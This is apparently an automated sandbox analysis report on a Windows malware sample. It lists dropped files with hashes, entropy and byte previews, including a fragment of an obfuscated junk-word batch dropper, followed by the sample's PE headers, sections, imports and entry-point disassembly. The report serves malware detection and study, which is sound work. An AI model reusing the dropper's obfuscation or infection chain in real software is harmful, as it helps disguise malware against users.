                                                                                                    Preview:..b.oZ....S....}$...8..;..e/...f....!......Z..M....xg.bc4...^....=...\S..E.A..w.n.E5......;LX..mi..|..N`...!..0j.=..%.0do.]..n.../.....CYft._T.......zQv.H...(.J..5.\..v...x...A.b.p(5..C....P.L......U.8....q.Rl:S`!z.?.J.T.@..v.[....&.j...]....).2...oq..G.M....h.0T. &..]hqgH..M.)...G.m.."*..g.`......c....Hid<..~..7ib...8.hv~.x...7w{..r'4w%..._..(&z..'._.`...b..N...\.B-:.C.....hq..&.S>5W.pUG..V.\.c.L.,.$BW.t.]..X(..x'm{..l..Cm...{.hN\o...?,....-..i..h....F.....l..@^4n;_.t8 .?...D.E.A......z.a.P.Tpl.N.,`.L.%<....Q.&H....AY..:.|.2.B.....G*O..js...9)H.h...,p{.93T.....Z...m....H.z.C../......N..Y.......GN...<(ra8. ...Xp.e5..>..D. .K....(".f..X.......~E..........Q..c"....j....2..O(.9$............N..n...;..6.I.GX.....N...O.K~....=OA..0...X...f.V..s:.s@.v.j.`.t.......<K.D.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.K

                                                                                                    C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65440
                                                                                                    Entropy (8bit):6.049806962480652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                                    MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                    SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                                    SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                                    SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                                                    C:\Users\user\AppData\Local\Temp\Flyer

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6079
                                                                                                    Entropy (8bit):6.1454181190325885
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H039LL:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5L
                                                                                                    MD5:7C69FC2B30363C5DF405306DD8A0BE9F
                                                                                                    SHA1:F87ECB504029520A1A143EAF3277558A25199CEB
                                                                                                    SHA-256:FB0B8C6E6D54F43174A71C7B42C0BD0B7CF2140F52AAAB514BB06ECCE15F80D1
                                                                                                    SHA-512:F55B924A391880EF37DEDC9BB7C7F541636EE936DEF17E4BFCBE46A9536128D75B4BF878AB869B0C3A686FD0FEC73376D196A8E2FE49643B1405EFEA057749D6
                                                                                                    Malicious:false
                                                                                                    Preview:pantyhoseyourslandscapesdisposition..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...........................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\Highlighted

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:ASCII text, with very long lines (304), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7130
                                                                                                    Entropy (8bit):5.155214984436157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QQmwxz2Dt7hgS/ryUml7U5MW2zgzn/T22D:FWyUmVCMWrPD
                                                                                                    MD5:674742A294AE6EE0A685696CA91D9913
                                                                                                    SHA1:DEF90DB4C44FDF4EC1D8698477434E3960063342
                                                                                                    SHA-256:A7233C9A08756C3EB05C6253A7A6C2EF9EC4F36816A8A733AE5280BF0E28CEA6
                                                                                                    SHA-512:FCB0074E54970CF1491F9D6DA442E92797563917295EC65FD01F3CDE5A43262F3A8423F1E2BA904C0E06F401E73A67E98DFD855328672B77A966957A9806D8FC
                                                                                                    Malicious:false
                                                                                                    Preview:Set Expanding=6..FiDh-Component-Tracks-..opTvcom-Lowest-Outline-Democrat-Raid-Directly-Vertical-Backgrounds-..KCrAud-Impact-Styles-Wild-..TQAChase-Associates-Madrid-Invite-Nutrition-Pleased-Tyler-Replace-Admitted-..BedNa-Fingers-Recording-Chelsea-Van-Kick-Ill-Stated-Lions-..MhQUnauthorized-Nitrogen-Ee-..zWzProvides-Devoted-Pay-Dublin-Cb-Nowhere-..iCaNDocuments-Overnight-Probe-Questionnaire-Sunset-..Set Lodging=G..QkISupreme-Shed-Initial-Folding-Example-Attractive-Improved-..wSDemocratic-Financing-..WcHThereby-Most-Geology-Guru-Infrastructure-Alphabetical-..zoIRCount-Mcdonald-Motels-Calgary-Newsletters-Justice-Ahead-..fcfTicket-Welsh-Resorts-Bm-Compilation-..VdSlBeen-Friendship-Invoice-..cbWRoses-Got-Discussion-Patents-Nevada-Php-Cream-Take-Impression-..ffnTowers-Language-Jeans-..PlReset-Lg-Trails-Activities-Dealers-..Set Albert=r..FZgSense-Ranges-..DHPregnancy-Pcs-Patient-Borders-Africa-Spider-Flag-Powers-Similarly-..JEEAIndie-..FSEwBackgrounds-Helena-Continue-Institution-Ict-Holders-L

                                                                                                    C:\Users\user\AppData\Local\Temp\Highlighted.bat

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:ASCII text, with very long lines (304), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7130
                                                                                                    Entropy (8bit):5.155214984436157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QQmwxz2Dt7hgS/ryUml7U5MW2zgzn/T22D:FWyUmVCMWrPD
                                                                                                    MD5:674742A294AE6EE0A685696CA91D9913
                                                                                                    SHA1:DEF90DB4C44FDF4EC1D8698477434E3960063342
                                                                                                    SHA-256:A7233C9A08756C3EB05C6253A7A6C2EF9EC4F36816A8A733AE5280BF0E28CEA6
                                                                                                    SHA-512:FCB0074E54970CF1491F9D6DA442E92797563917295EC65FD01F3CDE5A43262F3A8423F1E2BA904C0E06F401E73A67E98DFD855328672B77A966957A9806D8FC
                                                                                                    Malicious:false
                                                                                                    Preview:Set Expanding=6..FiDh-Component-Tracks-..opTvcom-Lowest-Outline-Democrat-Raid-Directly-Vertical-Backgrounds-..KCrAud-Impact-Styles-Wild-..TQAChase-Associates-Madrid-Invite-Nutrition-Pleased-Tyler-Replace-Admitted-..BedNa-Fingers-Recording-Chelsea-Van-Kick-Ill-Stated-Lions-..MhQUnauthorized-Nitrogen-Ee-..zWzProvides-Devoted-Pay-Dublin-Cb-Nowhere-..iCaNDocuments-Overnight-Probe-Questionnaire-Sunset-..Set Lodging=G..QkISupreme-Shed-Initial-Folding-Example-Attractive-Improved-..wSDemocratic-Financing-..WcHThereby-Most-Geology-Guru-Infrastructure-Alphabetical-..zoIRCount-Mcdonald-Motels-Calgary-Newsletters-Justice-Ahead-..fcfTicket-Welsh-Resorts-Bm-Compilation-..VdSlBeen-Friendship-Invoice-..cbWRoses-Got-Discussion-Patents-Nevada-Php-Cream-Take-Impression-..ffnTowers-Language-Jeans-..PlReset-Lg-Trails-Activities-Dealers-..Set Albert=r..FZgSense-Ranges-..DHPregnancy-Pcs-Patient-Borders-Africa-Spider-Flag-Powers-Similarly-..JEEAIndie-..FSEwBackgrounds-Helena-Continue-Institution-Ict-Holders-L

                                                                                                    C:\Users\user\AppData\Local\Temp\Intensity

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57522
                                                                                                    Entropy (8bit):7.996625480512146
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:TjNlqwJ/mmjrtGesZk4Rraajw+ZcG7dsoH12Q2IhdzNXt59udwzVX3Oppwvoihb5:tlqYj8tBOa5P7aQrhdzL59u4tOGj
                                                                                                    MD5:06330D422DF60304B4BA3F65E50EFD3B
                                                                                                    SHA1:14084105F183A59B0D6F5556D0CCD40059B5A989
                                                                                                    SHA-256:E833449BE64833FFF70A2B81D72BC9E79D46676B30F9BD47D9FA2C51F26D7241
                                                                                                    SHA-512:B28E9E2DCDA6046A9D0207EF3D6C1A5183E9BD2490031C9CB8D42336D06EBAD43C51B57A99572CF679416CC7610FD25A4C2475287E4728AB31261E222121B30C
                                                                                                    Malicious:false
                                                                                                    Preview:.S.#7.g.g?....6.`G.|.kSq^.@..V.7..s.O.Z.z.#.P3|..&u.z......)86...|g....u3...q..*..s7CD.<cs[ _.|}...'.......Em.W....~._.s1....A....;<......_.-cl.O.6fY D...I$..~QC......Bl...,._...r.`D^.....ul..........O.....%..(..W03.,"...ES~....=.{.G7...ez\.E...K.J.F.[...a5..`nBc....h..f..f......zI%......"..........F..|~.y.......Eyq..F......N..*?.WjR$..D...oo....@XVb.p.C....#...`.m..K.9@kE*..-B..EAt.B_..~.)...{.9w..p.d.....qZ..0.)..r.T..\D.@...z....5...7...q..lB.....i......X.3..@..|..@..C...U,...:...MP..T..l?.......2.....K.+.2..R..vg.."..B~...w.5.it$..zmc..0..[U..(........;..YN......A.b.....0..Kh...a6...f[:....n.JT\U.-.W/.*..t6...9....x.9.=...o...c......A.{.8........H.....x..b.Qn....<..P.I:b......}.@..S5%.Y..F..qyl."....n.3...KS....v..k=m.+.."R1...CN...k*....W0(.5.W.\d...f.r.......1.A.-.....r0...<.bms.[K..)44 S..b...&.L..R5B.....PQ|.|m.c.7.W..JI??......<.......6.....|B.Ky./.s...i....3..YxYn.H.[.L.....JO...^..2w...L.3.e...........".e.....

                                                                                                    C:\Users\user\AppData\Local\Temp\Tale

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72704
                                                                                                    Entropy (8bit):7.997899525914667
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:UzhqN4gqPYiLzLfE7MsVweop2gZhPlDopsvPid4npE318:RlqPYmzgAsVwVZhPlDxad4pE318
                                                                                                    MD5:0058D41F87A34C360BD93510DB25C6D1
                                                                                                    SHA1:A186EF494091CC652C03E232B16BC98C5A5714AA
                                                                                                    SHA-256:42A9FD93F9537CF54282FB095AE2EAB4BB35A44F5073EBDE4DA10B0DF7A621D7
                                                                                                    SHA-512:860EAAA02B6F40D525AAB88ED112A67D9790216A045E29BF20971253CCDB770DD767C0008B30369C9F6B428661CDED2A7B442AB886BAD9E60E2F3DA6B2545C72
                                                                                                    Malicious:false
                                                                                                    Preview:...q.....RC...,..#U...Z....J5/.q..|.l_..N....8.2GT.\....w.-.I...b.^[.4.,..~M.ho...8.g..cP..b...y5.e.Y.j....w.=._j.|.g...=.....S....][PW.d..oT...."...#)zm1.-a,.0d.."B.B..^.~<""...n^.... ..3.N..z.@.o.'.A..;..{...].~.b.......r(J.t[....I....;JX...-d/....$!..4;..J%....{X...%D.S$4..G;..9@..3.......4q4...W._..*...O4.W...%.....9...Za....kJ..0.....su.m..N..JrtL....%$...K...M.a;>.^......q.H.8/.`......w...0S.z...$.b.?y.p..;...7.yn...fU.6uP~gM../."n..Q.1.v".....x.hD.......?u..p..y..@s..."'..a.\..d..b.....#...........R.+rpP...h...{E?.....J.l~#eS...Z.vS.j.{......]K.<.)....Of..K>7.&...eR.*F......P._.S.. N:m...z...'..........E".;)0QiJ1 ........B...1.e.T"...9w.+c0...+...."Y.....=A..!<'...7s...;......k..=3.'.&1..:..E{.O6,....:..d.C.!a|.....I8.....).....J..u.v..D'T..b.`{-...5..2.{......aR....TW.?.... .F....u66|..1.9.Tw~....?..N.`....T.{..T.a...C:...........T..j....D....m..,.S..)A.y.<\..D.....^[...0G..5...q.k<2WN.3\.T1...C....z..>.P~....o..8)

                                                                                                    C:\Users\user\AppData\Local\Temp\Threat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):887566
                                                                                                    Entropy (8bit):6.622227307471724
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:rV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:xxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:575FAB4EA3AD0352F99FB2F1B40904B2
                                                                                                    SHA1:C6C98243BF86A6CE11149CA68A1AF80926275EFE
                                                                                                    SHA-256:2023B2B1B846879C0299968AF3CB8FCA736B29533B1488D317EA7B9CDC96537C
                                                                                                    SHA-512:DD71A2BAD3F116D098B3A3DC4B73F9E2CCC368649E08FF1D6C471544FDD8021A16679248EF46D364FA1585996C8EFCBAD41C03857B77A86FDD24CB007EC6C21E
                                                                                                    Malicious:false
                                                                                                    Preview:.f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....

                                                                                                    C:\Users\user\AppData\Local\Temp\Turn

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94208
                                                                                                    Entropy (8bit):7.998092078457812
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:t2K13O1LDzK6cIppQTIUIj8akLPaebXllVr/9PzOr3ByZHkyirghi5rI7V2CtFg:t3+D+6cImItj8aknXlll/tzfZHLc5E7A
                                                                                                    MD5:AF1C4B06A417402CB7499CAFB8F20DC9
                                                                                                    SHA1:D15CFE3DF9118D5443CF1ECB2169E648B08984F2
                                                                                                    SHA-256:C5039FA8D454C8042BB41D5398E524805197EC753CB68B18F1C3E32B063EEC2B
                                                                                                    SHA-512:3A711C1F919E86F6DBE0AF6CFB244E03BCAB6744E810CE0BB145A0DA221EB20E359F9C54109AE1EF9BB85844EFA5BB0E6B611831EAA75C9C011805AC627AF49E
                                                                                                    Malicious:false
                                                                                                    Preview:..b.oZ....S....}$...8..;..e/...f....!......Z..M....xg.bc4...^....=...\S..E.A..w.n.E5......;LX..mi..|..N`...!..0j.=..%.0do.]..n.../.....CYft._T.......zQv.H...(.J..5.\..v...x...A.b.p(5..C....P.L......U.8....q.Rl:S`!z.?.J.T.@..v.[....&.j...]....).2...oq..G.M....h.0T. &..]hqgH..M.)...G.m.."*..g.`......c....Hid<..~..7ib...8.hv~.x...7w{..r'4w%..._..(&z..'._.`...b..N...\.B-:.C.....hq..&.S>5W.pUG..V.\.c.L.,.$BW.t.]..X(..x'm{..l..Cm...{.hN\o...?,....-..i..h....F.....l..@^4n;_.t8 .?...D.E.A......z.a.P.Tpl.N.,`.L.%<....Q.&H....AY..:.|.2.B.....G*O..js...9)H.h...,p{.93T.....Z...m....H.z.C../......N..Y.......GN...<(ra8. ...Xp.e5..>..D. .K....(".f..X.......~E..........Q..c"....j....2..O(.9$............N..n...;..6.I.GX.....N...O.K~....=OA..0...X...f.V..s:.s@.v.j.`.t.......<K.D.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.K

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):5.987624667522481
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:DA92phBHUS.exe
                                                                                                    File size:3'145'765 bytes
                                                                                                    MD5:649673218a19e8fd278c99d1355949f4
                                                                                                    SHA1:da2b13b98dbb3ba3973388866860cb7cb3d2b59e
                                                                                                    SHA256:7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
                                                                                                    SHA512:5e6fab9f007e3015cc743f1ac962d77df7c479b4863e88fafc05a3a57896d7f3359afb91b18dcc88883a56c017c4fe279267a300effc37bf71c186fb080a00cd
                                                                                                    SSDEEP:24576:1az71UBrCXaw68FowF0vkf2fkAJzGthOXUKqx3Weeg:szRUDyFMPsAB0OXAV
                                                                                                    TLSH:FBE5F9C25B241316C916E592BF5F188817B17F9A7822BF6D9059A401E7FFA0E837F342
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                                    File Icon

                                                                                                    Icon Hash:fef0f2fafc8de670

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x403883
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:
                                                                                                    Signature Issuer:
                                                                                                    Signature Validation Error:
                                                                                                    Error Number:
                                                                                                    Not Before, Not After
                                                                                                      Subject Chain
                                                                                                        Version:
                                                                                                        Thumbprint MD5:
                                                                                                        Thumbprint SHA-1:
                                                                                                        Thumbprint SHA-256:
                                                                                                        Serial:

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        sub esp, 000002D4h
                                                                                                        push ebx
                                                                                                        push ebp
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 00000020h
                                                                                                        xor ebp, ebp
                                                                                                        pop esi
                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                        mov dword ptr [esp+10h], 00409268h
                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                        call dword ptr [00408030h]
                                                                                                        push 00008001h
                                                                                                        call dword ptr [004080B4h]
                                                                                                        push ebp
                                                                                                        call dword ptr [004082C0h]
                                                                                                        push 00000008h
                                                                                                        mov dword ptr [00472EB8h], eax
                                                                                                        call 00007F9890CB707Bh
                                                                                                        push ebp
                                                                                                        push 000002B4h
                                                                                                        mov dword ptr [00472DD0h], eax
                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                        push eax
                                                                                                        push ebp
                                                                                                        push 00409264h
                                                                                                        call dword ptr [00408184h]
                                                                                                        push 0040924Ch
                                                                                                        push 0046ADC0h
                                                                                                        call 00007F9890CB6D5Dh
                                                                                                        call dword ptr [004080B0h]
                                                                                                        push eax
                                                                                                        mov edi, 004C30A0h
                                                                                                        push edi
                                                                                                        call 00007F9890CB6D4Bh
                                                                                                        push ebp
                                                                                                        call dword ptr [00408134h]
                                                                                                        cmp word ptr [004C30A0h], 0022h
                                                                                                        mov dword ptr [00472DD8h], eax
                                                                                                        mov eax, edi
                                                                                                        jne 00007F9890CB464Ah
                                                                                                        push 00000022h
                                                                                                        pop esi
                                                                                                        mov eax, 004C30A2h
                                                                                                        push esi
                                                                                                        push eax
                                                                                                        call 00007F9890CB6A21h
                                                                                                        push eax
                                                                                                        call dword ptr [00408260h]
                                                                                                        mov esi, eax
                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                        jmp 00007F9890CB46D3h
                                                                                                        push 00000020h
                                                                                                        pop ebx
                                                                                                        cmp ax, bx
                                                                                                        jne 00007F9890CB464Ah
                                                                                                        add esi, 02h
                                                                                                        cmp word ptr [esi], bx

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                        • [LNK] VS2010 SP1 build 40219

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x20d4a.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xa2d9b0x1b40.ndata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0xf40000x20d4a0x20e008040873642d29b408feb2fb307b1d0e8False0.9612048479087453data7.853116998357041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x1150000xf320x1000888a04c908eecf15f67b9530e701c84bFalse0.58984375data5.424024474980326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xf42380x1d901PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9963828258553625
                                                                                                        RT_ICON0x111b3c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.6490032546786005
                                                                                                        RT_ICON0x1141a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8430851063829787
                                                                                                        RT_DIALOG0x11460c0x100dataEnglishUnited States0.5234375
                                                                                                        RT_DIALOG0x11470c0x11cdataEnglishUnited States0.6056338028169014
                                                                                                        RT_DIALOG0x1148280x60dataEnglishUnited States0.7291666666666666
                                                                                                        RT_GROUP_ICON0x1148880x30Targa image data - Map 32 x 55553 x 1 +1EnglishUnited States0.8541666666666666
                                                                                                        RT_VERSION0x1148b80x1bcdataEnglishUnited States0.5337837837837838
                                                                                                        RT_MANIFEST0x114a740x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
